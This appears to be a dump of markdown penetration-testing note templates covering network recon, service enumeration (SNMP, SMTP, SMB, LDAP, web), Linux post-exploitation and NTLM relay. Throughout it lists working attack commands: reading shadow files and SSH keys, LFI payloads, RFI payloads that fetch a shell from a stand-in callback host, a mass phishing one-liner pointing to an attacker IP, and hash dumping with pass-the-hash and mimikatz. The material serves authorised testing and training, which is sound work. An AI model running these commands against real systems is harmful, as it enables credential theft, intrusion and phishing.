/usr/share/nmap/scripts/snmp-win32-shares.nse 23 | /usr/share/nmap/scripts/snmp-win32-software.nse 24 | /usr/share/nmap/scripts/snmp-win32-users.nse 25 | 26 | Metasploit aux modules: 27 | 28 | auxiliary/scanner/misc/oki_scanner 29 | auxiliary/scanner/snmp/aix_version 30 | auxiliary/scanner/snmp/arris_dg950 31 | auxiliary/scanner/snmp/brocade_enumhash 32 | auxiliary/scanner/snmp/cisco_config_tftp 33 | auxiliary/scanner/snmp/cisco_upload_file 34 | auxiliary/scanner/snmp/cnpilot_r_snmp_loot 35 | auxiliary/scanner/snmp/epmp1000_snmp_loot 36 | auxiliary/scanner/snmp/netopia_enum 37 | auxiliary/scanner/snmp/sbg6580_enum 38 | auxiliary/scanner/snmp/snmp_enum 39 | auxiliary/scanner/snmp/snmp_enum_hp_laserjet 40 | auxiliary/scanner/snmp/snmp_enumshares 41 | auxiliary/scanner/snmp/snmp_enumusers 42 | auxiliary/scanner/snmp/snmp_login 43 | 44 | 45 | Onesixtyone: 46 | 47 | - onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X 48 | 49 | Snmp-check 50 | 51 | 52 | - snmp-check 172.21.0.0 -c public 53 | 54 | 55 | Impacket: 56 | 57 | - python3 samdump.py SNMP 172.21.0.0 58 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/General Notes.md: -------------------------------------------------------------------------------- 1 | SNMP Walk: 2 | 3 | 4 | - snmpwalk -c public -v1 ipaddress 1 5 | - snmpwalk -c private -v1 ipaddress 1 6 | - snmpwalk -c manager -v1 ipaddress 1 7 | 8 | 9 | Nmap: 10 | 11 | - nmap 172.21.0.0 -Pn -sU -p 161 --script= 12 | 13 | /usr/share/nmap/scripts/snmp-brute.nse 14 | /usr/share/nmap/scripts/snmp-hh3c-logins.nse 15 | /usr/share/nmap/scripts/snmp-info.nse 16 | /usr/share/nmap/scripts/snmp-interfaces.nse 17 | /usr/share/nmap/scripts/snmp-ios-config.nse 18 | /usr/share/nmap/scripts/snmp-netstat.nse 19 | /usr/share/nmap/scripts/snmp-processes.nse 20 | /usr/share/nmap/scripts/snmp-sysdescr.nse 21 | /usr/share/nmap/scripts/snmp-win32-services.nse 22 | /usr/share/nmap/scripts/snmp-win32-shares.nse 23 | /usr/share/nmap/scripts/snmp-win32-software.nse 24 | /usr/share/nmap/scripts/snmp-win32-users.nse 25 | 26 | Metasploit aux modules: 27 | 28 | auxiliary/scanner/misc/oki_scanner 29 | auxiliary/scanner/snmp/aix_version 30 | auxiliary/scanner/snmp/arris_dg950 31 | auxiliary/scanner/snmp/brocade_enumhash 32 | auxiliary/scanner/snmp/cisco_config_tftp 33 | auxiliary/scanner/snmp/cisco_upload_file 34 | auxiliary/scanner/snmp/cnpilot_r_snmp_loot 35 | auxiliary/scanner/snmp/epmp1000_snmp_loot 36 | auxiliary/scanner/snmp/netopia_enum 37 | auxiliary/scanner/snmp/sbg6580_enum 38 | auxiliary/scanner/snmp/snmp_enum 39 | auxiliary/scanner/snmp/snmp_enum_hp_laserjet 40 | auxiliary/scanner/snmp/snmp_enumshares 41 | auxiliary/scanner/snmp/snmp_enumusers 42 | auxiliary/scanner/snmp/snmp_login 43 | 44 | 45 | Onesixtyone: 46 | 47 | - onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X 48 | 49 | Snmp-check 50 | 51 | 52 | - snmp-check 172.21.0.0 -c public 53 | 54 | 55 | Impacket: 56 | 57 | - python3 samdump.py SNMP 172.21.0.0 58 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/4. SNMP/General Notes.md: -------------------------------------------------------------------------------- 1 | ## SNMP Walk: 2 | 3 | 4 | - snmpwalk -c public -v1 ipaddress 1 5 | - snmpwalk -c private -v1 ipaddress 1 6 | - snmpwalk -c manager -v1 ipaddress 1 7 | 8 | 9 | ## Nmap Enumeration: 10 | 11 | - nmap 172.21.0.0 -Pn -sU -p 161 --script= 12 | 13 | /usr/share/nmap/scripts/snmp-brute.nse 14 | /usr/share/nmap/scripts/snmp-hh3c-logins.nse 15 | /usr/share/nmap/scripts/snmp-info.nse 16 | /usr/share/nmap/scripts/snmp-interfaces.nse 17 | /usr/share/nmap/scripts/snmp-ios-config.nse 18 | /usr/share/nmap/scripts/snmp-netstat.nse 19 | /usr/share/nmap/scripts/snmp-processes.nse 20 | /usr/share/nmap/scripts/snmp-sysdescr.nse 21 | /usr/share/nmap/scripts/snmp-win32-services.nse 22 | /usr/share/nmap/scripts/snmp-win32-shares.nse 23 | /usr/share/nmap/scripts/snmp-win32-software.nse 24 | /usr/share/nmap/scripts/snmp-win32-users.nse 25 | 26 | ## Metasploit auxilary modules: 27 | 28 | auxiliary/scanner/misc/oki_scanner 29 | auxiliary/scanner/snmp/aix_version 30 | auxiliary/scanner/snmp/arris_dg950 31 | auxiliary/scanner/snmp/brocade_enumhash 32 | auxiliary/scanner/snmp/cisco_config_tftp 33 | auxiliary/scanner/snmp/cisco_upload_file 34 | auxiliary/scanner/snmp/cnpilot_r_snmp_loot 35 | auxiliary/scanner/snmp/epmp1000_snmp_loot 36 | auxiliary/scanner/snmp/netopia_enum 37 | auxiliary/scanner/snmp/sbg6580_enum 38 | auxiliary/scanner/snmp/snmp_enum 39 | auxiliary/scanner/snmp/snmp_enum_hp_laserjet 40 | auxiliary/scanner/snmp/snmp_enumshares 41 | auxiliary/scanner/snmp/snmp_enumusers 42 | auxiliary/scanner/snmp/snmp_login 43 | 44 | 45 | Onesixtyone: 46 | 47 | - onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X 48 | 49 | Snmp-check 50 | 51 | - snmp-check 172.21.0.0 -c public 52 | 53 | Impacket: 54 | 55 | - python3 samdump.py SNMP 172.21.0.0 56 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## Finding Sensitive files on Linux: 2 | 3 | ``` 4 | locate password | more 5 | /boot/grub/i386-pc/password.mod 6 | /etc/pam.d/common-password 7 | /etc/pam.d/gdm-password 8 | /etc/pam.d/gdm-password.original 9 | /lib/live/config/0031-root-password 10 | ``` 11 | - cat /etc/profile 12 | - cat /etc/passwd 13 | - cat /etc/group 14 | - cat /etc/shadow 15 | - cat /etc/gshadow 16 | - cat /var/apache2/config.inc 17 | - cat /var/lib/mysql/mysql/user.MYD 18 | - cat /root/anaconda-ks.cfg 19 | - cat ~/.bash_history 20 | - cat ~/.bash_profile 21 | - cat ~/.bash_login 22 | - cat ~/.nano_history 23 | - cat ~/.atftp_history 24 | - cat ~/.mysql_history 25 | - cat ~/.php_history 26 | - ls -alh /var/mail/ 27 | 28 | Sensitive Files for SSH: 29 | 30 | - find / -name authorized_keys 2> /dev/null 31 | - find / -name id_rsa 2> /dev/null 32 | 33 | 34 | 35 | Log Files that could help: 36 | 37 | ``` 38 | cat /etc/httpd/logs/access_log 39 | cat /etc/httpd/logs/access.log 40 | cat /etc/httpd/logs/error_log 41 | cat /etc/httpd/logs/error.log 42 | cat /var/log/apache2/access_log 43 | cat /var/log/apache2/access.log 44 | cat /var/log/apache2/error_log 45 | cat /var/log/apache2/error.log 46 | cat /var/log/apache/access_log 47 | cat /var/log/apache/access.log 48 | cat /var/log/auth.log 49 | cat /var/log/chttp.log 50 | cat /var/log/cups/error_log 51 | cat /var/log/dpkg.log 52 | cat /var/log/faillog 53 | cat /var/log/httpd/access_log 54 | cat /var/log/httpd/access.log 55 | cat /var/log/httpd/error_log 56 | cat /var/log/httpd/error.log 57 | cat /var/log/lastlog 58 | cat /var/log/lighttpd/access.log 59 | cat /var/log/lighttpd/error.log 60 | cat /var/log/lighttpd/lighttpd.access.log 61 | cat /var/log/lighttpd/lighttpd.error.log 62 | cat /var/log/messages 63 | cat /var/log/secure 64 | cat /var/log/syslog 65 | cat /var/log/wtmp 66 | cat /var/log/xferlog 67 | cat /var/log/yum.log 68 | cat /var/run/utmp 69 | cat /var/webmin/miniserv.log 70 | cat /var/www/logs/access_log 71 | cat /var/www/logs/access.log 72 | ls -alh /var/lib/dhcp3/ 73 | ls -alh /var/log/postgresql/ 74 | ls -alh /var/log/proftpd/ 75 | ls -alh /var/log/samba/ 76 | 77 | Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp 78 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## Finding Sensitive files on Linux: 2 | 3 | ``` 4 | locate password | more 5 | /boot/grub/i386-pc/password.mod 6 | /etc/pam.d/common-password 7 | /etc/pam.d/gdm-password 8 | /etc/pam.d/gdm-password.original 9 | /lib/live/config/0031-root-password 10 | ``` 11 | - cat /etc/profile 12 | - cat /etc/passwd 13 | - cat /etc/group 14 | - cat /etc/shadow 15 | - cat /etc/gshadow 16 | - cat /var/apache2/config.inc 17 | - cat /var/lib/mysql/mysql/user.MYD 18 | - cat /root/anaconda-ks.cfg 19 | - cat ~/.bash_history 20 | - cat ~/.bash_profile 21 | - cat ~/.bash_login 22 | - cat ~/.nano_history 23 | - cat ~/.atftp_history 24 | - cat ~/.mysql_history 25 | - cat ~/.php_history 26 | - ls -alh /var/mail/ 27 | 28 | Sensitive Files for SSH: 29 | 30 | - find / -name authorized_keys 2> /dev/null 31 | - find / -name id_rsa 2> /dev/null 32 | 33 | 34 | 35 | Log Files that could help: 36 | 37 | ``` 38 | cat /etc/httpd/logs/access_log 39 | cat /etc/httpd/logs/access.log 40 | cat /etc/httpd/logs/error_log 41 | cat /etc/httpd/logs/error.log 42 | cat /var/log/apache2/access_log 43 | cat /var/log/apache2/access.log 44 | cat /var/log/apache2/error_log 45 | cat /var/log/apache2/error.log 46 | cat /var/log/apache/access_log 47 | cat /var/log/apache/access.log 48 | cat /var/log/auth.log 49 | cat /var/log/chttp.log 50 | cat /var/log/cups/error_log 51 | cat /var/log/dpkg.log 52 | cat /var/log/faillog 53 | cat /var/log/httpd/access_log 54 | cat /var/log/httpd/access.log 55 | cat /var/log/httpd/error_log 56 | cat /var/log/httpd/error.log 57 | cat /var/log/lastlog 58 | cat /var/log/lighttpd/access.log 59 | cat /var/log/lighttpd/error.log 60 | cat /var/log/lighttpd/lighttpd.access.log 61 | cat /var/log/lighttpd/lighttpd.error.log 62 | cat /var/log/messages 63 | cat /var/log/secure 64 | cat /var/log/syslog 65 | cat /var/log/wtmp 66 | cat /var/log/xferlog 67 | cat /var/log/yum.log 68 | cat /var/run/utmp 69 | cat /var/webmin/miniserv.log 70 | cat /var/www/logs/access_log 71 | cat /var/www/logs/access.log 72 | ls -alh /var/lib/dhcp3/ 73 | ls -alh /var/log/postgresql/ 74 | ls -alh /var/log/proftpd/ 75 | ls -alh /var/log/samba/ 76 | 77 | Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp 78 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/03. Email Services/Enumerating Email Services.md: -------------------------------------------------------------------------------- 1 | # SMTP Ports: 2 | 3 | 25, 465, 587 4 | 5 | ## Manual Connection 6 | ``` 7 | $ nc -nv x.x.x.x 25 8 | 9 | ``` 10 | 11 | # SMTP Enumeration Tools 12 | 13 | ## Nmap Enumeration 14 | ``` 15 | $ ls -lh /usr/share/nmap/scripts/ | grep smtp 16 | -rw-r--r-- 1 root root 4309 Oct 12 09:29 smtp-brute.nse 17 | -rw-r--r-- 1 root root 4769 Oct 12 09:29 smtp-commands.nse 18 | -rw-r--r-- 1 root root 12006 Oct 12 09:29 smtp-enum-users.nse 19 | -rw-r--r-- 1 root root 5873 Oct 12 09:29 smtp-ntlm-info.nse 20 | -rw-r--r-- 1 root root 10148 Oct 12 09:29 smtp-open-relay.nse 21 | -rw-r--r-- 1 root root 716 Oct 12 09:29 smtp-strangeport.nse 22 | -rw-r--r-- 1 root root 14781 Oct 12 09:29 smtp-vuln-cve2010-4344.nse 23 | -rw-r--r-- 1 root root 7719 Oct 12 09:29 smtp-vuln-cve2011-1720.nse 24 | -rw-r--r-- 1 root root 7603 Oct 12 09:29 smtp-vuln-cve2011-1764.nse 25 | $ nmap x.x.x.x -p 25 -sV --script=exampleScript1.nse,exampleScript2.nse 26 | ``` 27 | 28 | ## Metasploit: 29 | 30 | ``` 31 | msf > use auxiliary/scanner/smtp/smtp_enum 32 | msf auxiliary(smtp_enum) set RHOSTS 33 | msf auxiliary(smtp_enum) > set rport 25 34 | msf auxiliary(smtp_enum) set USER_FILE
35 | msf auxiliary(smtp_enum) run 36 | ``` 37 | 38 | ## smtp-user-enum 39 | - Install (Kali Linux): 40 | ``` 41 | sudo apt install smtp-user-enum 42 | ``` 43 | 44 | ``` 45 | $ smtp-user-enum -M VRFY -U users.txt -t 172.21.0.0 46 | $ smtp-user-enum -M EXPN -u admin1 -t 172.21.0.0 47 | $ smtp-user-enum -M RCPT -U users.txt -T server-ips.txt 48 | $ smtp-user-enum -M EXPN -D example.com -U users.txt -t 172.21.0.0 49 | ``` 50 | 51 | ## Mass email 52 | 53 | If you've collected emails from the target domain, you can use something like the following to send out super simple phishing emails. (Saw this on a HTB machine, keep expectations of success low in the real world) 54 | ``` 55 | $ while read mail; do swaks –to $mail –from IT@targetdomain.com –header "Subject: Credentials / Errors" –body "goto http://attackerIP/" –server x.x.x.x; done < mails.txt 56 | ``` 57 | 58 | # POP3 Enumeration 59 | 60 | ## Nmap Enumeration 61 | 62 | ``` 63 | $ ls -lh /usr/share/nmap/scripts/ | grep pop 64 | -rw-r--r-- 1 root root 3953 Oct 12 09:29 pop3-brute.nse 65 | -rw-r--r-- 1 root root 1397 Oct 12 09:29 pop3-capabilities.nse 66 | -rw-r--r-- 1 root root 4941 Oct 12 09:29 pop3-ntlm-info.nse 67 | $ nmap x.x.x.x -p 110 -sV --script=exampleScript1.nse,exampleScript2.nse 68 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Enumerating Web Services.md: -------------------------------------------------------------------------------- 1 | 2 | # Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE! 3 | 4 | ## Step 2: 5 | 6 | ## Common Wordlists to use for Web App Scanning: 7 | 8 | Common Wordlists to use for Web Directory Scanning: 9 | - /usr/share/wordlists/dirb/common.txt 10 | - /usr/share/wordlists/dirbuster/*.txt 11 | - /usr/share/wordlists/wfuzz/general/*.txt 12 | - /usr/share/seclists/Discovery/Web-Content/ 13 | - Assetnote Wordlists: https://wordlists.assetnote.io/ 14 | - Jhaddix Content Discovery: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10 15 | 16 | Common Wordlists to use for User Enumeration Scanning: 17 | - /usr/share/seclists/Usernames 18 | - /usr/share/wordlists/dirbuster/apache-user-enum-2.0 19 | 20 | ## Web App Scanners 21 | 22 | 23 | Wpscan(WordPress Scannner): 24 | 25 | - wpscan --url 26 | - wpscan --url --enumerate ap at (All Plugins, All Themes) 27 | - wpscan --url --enumerate u (Usernames) 28 | - wpscan --url --enumerate v 29 | 30 | 31 | 32 | Other Tools: 33 | - Burp Suite 34 | - OWASP Zap 35 | - Cadaver 36 | - SQLMap 37 | - Joomscan 38 | - Feroxbuster 39 | 40 | ## Testing for LFI: 41 | 42 | https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf 43 | 44 | Examples: 45 | 46 | http://example.com/index.php?page=etc/passwd 47 | http://example.com/index.php?page=etc/passwd%00 48 | http://example.com/index.php?page=../../etc/passwd 49 | http://example.com/index.php?page=%252e%252e%252f 50 | http://example.com/index.php?page=....//....//etc/passwd 51 | 52 | Interesting Files: 53 | 54 | Linux: 55 | 56 | ``` 57 | /etc/passwd 58 | /etc/shadow 59 | /etc/issue 60 | /etc/group 61 | /etc/hostname 62 | /etc/ssh/ssh_config 63 | /etc/ssh/sshd_config 64 | /root/.ssh/id_rsa 65 | /root/.ssh/authorized_keys 66 | /home/user/.ssh/authorized_keys 67 | /home/user/.ssh/id_rsa 68 | ``` 69 | 70 | Windows: 71 | ``` 72 | /boot.ini 73 | /autoexec.bat 74 | /windows/system32/drivers/etc/hosts 75 | /windows/repair/SAM 76 | ``` 77 | 78 | 79 | ## Testing for RFI: 80 | 81 | http://example.com/index.php?page=http://callback.com/shell.txt 82 | http://example.com/index.php?page=http://callback.com/shell.txt%00 83 | http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt 84 | 85 | ## Resources 86 | 87 | - Turning LFI to RFI: 88 | https://l.avala.mp/?p=241 89 | Backup: https://web.archive.org/web/20210612222732/https://l.avala.mp/?p=241 -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md: -------------------------------------------------------------------------------- 1 | # "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to" 2 | 3 | 4 | ## tcpdump: 5 | 6 | - tcpdump -i eth0 7 | - tcpdump -c -i eth0 8 | - tcpdump -A -i eth0 9 | - tcpdump -w 0001.pcap -i eth0 10 | - tcpdump -r 0001.pcap 11 | - tcpdump -n -i eth0 12 | - tcpdump -i eth0 port 22 13 | - tcpdump -i eth0 -src 172.21.10.X 14 | - tcpdump -i eth0 -dst 172.21.10.X 15 | 16 | Other tools: 17 | 18 | Tshark (Command Line Wireshark) 19 | Wireshark 20 | 21 | 22 | ## Network Scanning 23 | 24 | NetDiscover (ARP Scanning): 25 | - netdiscover -i eth0 26 | - netdiscover -r 172.21.10.0/24 27 | 28 | Nmap: 29 | 30 | - nmap -sn 172.21.10.0/24 31 | - nmap -sn 172.21.10.1-253 32 | - nmap -sn 172.21.10.* 33 | 34 | Nbtscan: 35 | - nbtscan -r 172.21.1.0/24 36 | 37 | Linux Ping Sweep (Bash) 38 | 39 | - for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done 40 | 41 | Windows Ping Sweep (Run on Windows System) 42 | 43 | - for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up. 44 | 45 | 46 | 47 | ## Host Scanning 48 | 49 | Nmap: 50 | 51 | - nmap -sC -sV 172.21.0.0 52 | - nmap -sV -Pn 172.21.0.0 53 | - nmap -T4 -sC -sV 172.21.0.0 54 | - nmap -A 172.21.0.0 55 | 56 | IPv6 Scan: 57 | 58 | Nmap Scripts: 59 | 60 | Location: /usr/share/nmap/scripts/ 61 | 62 | - nmap --scripts vuln,safe,discovery -oN results.txt target-ip 63 | 64 | Scans through Socks proxy: 65 | 66 | - nmap --proxies socks4://proxy-ip:8080 target-ip 67 | 68 | DNSRecon: 69 | 70 | - dnsrecon -d www.example.com -a 71 | - dnsrecon -d www.example.com -t axfr 72 | - dnsrecon -d 73 | - dnsrecon -d www.example.com -D -t brt 74 | 75 | Dig: 76 | 77 | - dig www.example.com + short 78 | - dig www.example.com MX 79 | - dig www.example.com NS 80 | - dig www.example.com> SOA 81 | - dig www.example.com ANY +noall +answer 82 | - dig -x www.example.com 83 | - dig -4 www.example.com (For IPv4) 84 | - dig -6 www.example.com (For IPv6) 85 | - dig www.example.com mx +noall +answer example.com ns +noall +answer 86 | - dig -t AXFR www.example.com 87 | 88 | Sublis3r: 89 | 90 | - Sublist3r -d www.example.com 91 | - Sublist3r -v -d www.example.com -p 80,443 92 | 93 | OWASP AMASS: 94 | 95 | - amass enum -d www.example.com 96 | - amass intel -whois -d www.example.com 97 | - amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 98 | - amass intel -ipv4 -whois -d www.example.com 99 | - amass intel -ipv6 -whois -d www.example.com 100 | 101 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/05. Network Shares (SMB, SAMBA, NFS)/SMB Enumeration.md: -------------------------------------------------------------------------------- 1 | # Nmap Enumeration: 2 | ``` 3 | /usr/share/nmap/scripts/smb-brute.nse 4 | /usr/share/nmap/scripts/smb-enum-domains.nse 5 | /usr/share/nmap/scripts/smb-enum-groups.nse 6 | /usr/share/nmap/scripts/smb-enum-processes.nse 7 | /usr/share/nmap/scripts/smb-enum-services.nse 8 | /usr/share/nmap/scripts/smb-enum-sessions.nse 9 | /usr/share/nmap/scripts/smb-enum-shares.nse 10 | /usr/share/nmap/scripts/smb-enum-users.nse 11 | /usr/share/nmap/scripts/smb-flood.nse 12 | /usr/share/nmap/scripts/smb-ls.nse 13 | /usr/share/nmap/scripts/smb-mbenum.nse 14 | /usr/share/nmap/scripts/smb-os-discovery.nse 15 | /usr/share/nmap/scripts/smb-print-text.nse 16 | /usr/share/nmap/scripts/smb-protocols.nse 17 | /usr/share/nmap/scripts/smb-psexec.nse 18 | /usr/share/nmap/scripts/smb-security-mode.nse 19 | /usr/share/nmap/scripts/smb-server-stats.nse 20 | /usr/share/nmap/scripts/smb-system-info.nse 21 | ``` 22 | 23 | - nmap --script smb-* -p 139,445, 172.21.0.0 24 | - nmap --script smb-enum-* -p 139,445, 172.21.0.0 25 | 26 | 27 | 28 | # Enum4linux: 29 | 30 | - Enum4linux -a 172.21.0.0 31 | - Enum4linux -U 172.21.0.0 32 | - Enum4linux -r 172.21.0.0 33 | - Enum4linux -S 172.21.0.0 34 | 35 | # Enum4linux-Ng 36 | https://github.com/cddmp/enum4linux-ng 37 | - Enum4linux 172.21.0.0 -A 38 | - Enum4linux-ng 172.21.0.0 -A -C 39 | - Enum4linux 172.21.0.0 -S 40 | - Enum4linux 172.21.0.0 -K ticket.kirbi -A 41 | 42 | # SMBmap: 43 | 44 | - smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password] 45 | - smbmap -H 172.21.0.0 -d [domain] -u "" -p "" 46 | 47 | # SMBClient: 48 | 49 | - smbclient -L 172.21.0.0 50 | - smbclient //172.21.0.0/tmp 51 | 52 | Recursively list a directory: 53 | ``` 54 | $ smbclient \\\\x.x.x.x\\Folder 55 | smb: \> recurse on 56 | smb: \> ls 57 | ``` 58 | 59 | # Impacket: 60 | 61 | ## Smbclient: 62 | - /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0 63 | - impacket-smbclient username@172.21.0.0 64 | ## Samdump: 65 | - Impackert-sam SMB 172.21.0.0 66 | 67 | # RPCclient: 68 | 69 | - rpcclient -U "" -N 172.21.0.0 enumdomusers 70 | 71 | # CrackMapExec: 72 | 73 | - crackmapexec smb -L 74 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth 75 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --share 76 | - crackmapexec smb --gen-relay-list smb-targets.txt 172.21.0.0/24 77 | - crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz 78 | - crackmapexec smb x.x.x.x --pass-pol -u '' -p '' 79 | 80 | # Polenum: 81 | - polenum -u '' -p '' -d x.x.x.x 82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket NtlmRelayX.md: -------------------------------------------------------------------------------- 1 | # Utilizing Sock sessions with Responder and NtlmRelayX 2 | 3 | ``` 4 | ntlmrelayx> socks 5 | Protocol Target Username Port 6 | -------- -------------- ------------------------ ---- 7 | SMB 172.21.48.38 SPAWN/MSIMMONS 445 8 | MSSQL 172.21.48.230 FAERIE/ADMINISTRATOR 1433 9 | MSSQL 172.21.48.230 FAERIE/ROOT 1433 10 | SMB 172.21.48.230 FAERIE/ADMINISTRATOR 445 11 | SMB 172.21.48.230 FAERIE/ALSIMMONS 445 12 | SMTP 172.21.48.225 FAERIEEXCHANGE/SBURKE 25 13 | SMTP 172.21.48.225 FAERIEEXCHANGE/TWILLIAMS 25 14 | IMAP 172.21.48.225 FAERIEEXCHANGE/TMCFARLANE 143 15 | ``` 16 | 17 | # Testing Sock Access from NtlmRelayX: 18 | ## SMB: 19 | Using SMBExec: 20 | - proxychains4 impacket-smbexec SPAWN/MSIMMONS@172.21.48.38 21 | - proxychains4 smbexec.py SPAWN/MSIMMONS@172.21.48.38 22 | Using Smbclient 23 | - proxychains4 impacket-smbclient SPAWN/MSIMMONS@172.21.48.38 24 | - proxychains4 smbclient.py SPAWN/MSIMMONS@172.21.48.38 25 | 26 | ## Secrets Dump 27 | - proxychains4 impacket-secretsdump SPAWN/MSIMMONS@172.21.48.38 28 | - proxychains4 secretsdump.py SPAWN/MSIMMONS@172.21.48.38 29 | 30 | ## Pass The Hash: 31 | If you obtain hashes from ntlmrelayx you can use the ntlm hash to gain access to a target using the following scripts or tools: 32 | 33 | Impacket Wmiexec: 34 | - impacket-wmiexec -hashes ' INSERT HASH HERE' administrator@172.21.48.230 35 | - wmiexec.py -hashes ' INSERT HASH HERE' administrator@172.21.48.230 36 | 37 | Evil-WinRM: 38 | - evil-winrm -u Administrator -H 'INSERT HASH HERE' -i 172.21.48.230 39 | 40 | XfreeRDP: 41 | - xfreerdp /u:Administrator /pth:'INSERT HASH HERE' /v:172.21.48.230 42 | 43 | # Other NtlmRelayX Commands: 44 | ## In Kali: 45 | ### SMB 46 | - impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c 47 | - impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c whoami 48 | ### Ldap 49 | - impacket-ntlmrelayx -t ldap://dc.domain.local --shadow-credentials --shadow-target target\$ 50 | 51 | ## Python Impacket: 52 | ### SMB 53 | - ntlmrelayx.py -socks -smb2support -tf smb-targets.txt -c 54 | - ntlmrelayx.py -tf smb-targets.txt -c whoami 55 | ### LDAP 56 | - ntlmrelayx.py -t ldap://dc.domain.local --shadow-credentials --shadow-target target\$ 57 | 58 | # References: 59 | - https://www.hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/ 60 | - https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0 61 | - https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/ 62 | - https://www.offsec-journey.com/post/attacking-ms-sql-servers -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/8. Other Services/LDAP Enumeration (Port 389).md: -------------------------------------------------------------------------------- 1 | # LDAP Enumeration Tools 2 | 3 | **Note:** Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 4 | 5 | ### ldapsearch 6 | 7 | Simple authentication check: 8 | ``` 9 | $ ldapsearch -h -x 10 | ``` 11 | Anonymous Credential LDAP Dumping: 12 | ``` 13 | $ ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’ 14 | ``` 15 | Getting DN: 16 | ``` 17 | $ ldapsearch -h -x -s base namingcontexts 18 | ``` 19 | - `-s` is scope: one of base, one, sub or children (search scope) 20 | 21 | If you get DN from above command, use it in a base search (-b basedn: base dn for search) 22 | ``` 23 | $ ldapsearch -h -x -b "DC=,DC=" 24 | ``` 25 | You can also query the LDAP server: 26 | ``` 27 | $ ldapsearch -h -x -b "DC=,DC=" 28 | ``` 29 | i.e. user enumeration: 30 | ``` 31 | $ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' 32 | ``` 33 | This will give a lot of useful information, i.e. when password was last reset, username of the account (sAMAccountName). 34 | 35 | Filtering your query: 36 | ``` 37 | $ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' 38 | ``` 39 | I.e. to query for only account names: 40 | ``` 41 | $ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' sAMAccountName 42 | ``` 43 | Or use grep to get a list of account names for password spraying: 44 | ``` 45 | $ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' sAMAccountName | grep sAMAccountName | awk '{print $2}' > userlist.ldap 46 | ``` 47 | 48 | ### Impacket 49 | 50 | Using that username list generated from `ldapsearch`, we can use Impacket's `GetNPUsers.py` to see if we can get a user's TGT: 51 | ``` 52 | $ python3 GetNPUsers.py -dc-ip -request domain.local/ -userfile userlist.ldap -format john 53 | ``` 54 | or 55 | ``` 56 | $ GetADUsers.py -all -dc-ip 57 | ``` 58 | 59 | You can simply change the -format flag to hashcat if you want to use hashcat. 60 | 61 | Or try with no password: 62 | ``` 63 | $ python3 GetNPUsers.py -request -no-pass -dc-ip 64 | ``` 65 | 66 | Impacket `lookupsid.py`: 67 | ``` 68 | $ /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@x.x.x.x 69 | ``` 70 | 71 | ### Windapsearch 72 | 73 | Source: https://github.com/ropnop/windapsearch 74 | ``` 75 | $ python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U 76 | ``` 77 | 78 | #### References: 79 | 80 | - [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise) -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/DNS_Hostname Discovery.md: -------------------------------------------------------------------------------- 1 | # DNS Discovery 2 | 3 | DNSRecon: 4 | 5 | - 